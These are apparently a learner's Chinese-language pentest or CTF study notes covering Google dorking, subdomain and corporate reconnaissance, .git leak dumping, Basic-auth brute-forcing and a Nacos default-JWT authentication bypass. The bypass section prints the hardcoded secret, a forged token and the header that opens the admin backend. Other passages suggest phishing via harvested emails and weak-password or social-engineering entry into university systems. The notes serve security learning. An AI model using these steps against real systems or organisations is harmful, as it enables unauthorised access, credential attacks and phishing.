信息收集

这方面知识跟以前学的大差不差

google hack

关键字 功能
site 指定要搜索的域名
intitle 指定网页标题包含的字段
filetype 指定文件类型
找到的文件别乱点,尽量放虚拟环境

域名收集

收集完要测活

工具推荐–ehole

源码编译一直出现超时问题,直接下包吧
结果不一定正确,还是需要分析

企业信息收集

官网基本就别想了,可以去查看股权结构图(爱企查的话,是股权穿透图,找100%占比的资产,要不然可能不认)
邮箱可用来钓鱼

思路总结

企业

找边缘资产,然后找洞利用

找配置信息,然后进内网

edu

因为用户量大,可以搞弱口令或者社工方式进系统,然后后台拿权什么什么的

源码泄露

.git泄露

可以用dumpall,因为他能识别蜜罐,githack不能识别蜜罐

身份认证机制攻击

basic认证

例如明文数据是admin:admin格式,然后采用了base64编码

法一

那么就可以手动编辑字典,然后在爆破模块中添加base64编码的处理规则
具体的字典处理直接问ai(一般适用于确定了用户名的情况,一般指定admin)

法二

在规则中加前缀admin:,然后再增加编码的规则

nacos jwt认证

根据fscan的扫描结果,直接搜poc跟着复现就行了

原理大致就是利用未更改的默认key构造jwt数据
在nacos中,token.secret.key值是固定死的,位置在conf下的application.properties中:

1
SecretKey012345678901234567890123456789012345678901234567890123456789

然后运用到一个构造用的网站
然后数据这么填写

iat字段的值是时间戳,用个转换的网站转换下就行了,时间就设置日期比当前推后一天就行,比如今天是2025-03-25,设置成2025-03-26,然后转换,就是1742918400
然后构造好的jwt数据就是

1
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImlhdCI6MTc0MjkxODQwMH0.3IC_lc9vcofVpWJPHjCbWMJJIs3mZabZBTFTqWedi0A


在登录的时候抓个包,添加上Authorization:值就是刚刚构造的jwt数据
w3c规定:jwt token的标准写法Authorization: Bearer aaa.bbb.ccc
所以添加:

1
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImlhdCI6MTc0MjkxODQwMH0.3IC_lc9vcofVpWJPHjCbWMJJIs3mZabZBTFTqWedi0A


然后发包,测试能进入,就是就是重新抓包,然后添加Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImlhdCI6MTc0MjkxODQwMH0.3IC_lc9vcofVpWJPHjCbWMJJIs3mZabZBTFTqWedi0A,再放包,然后就能进入后台了

flag: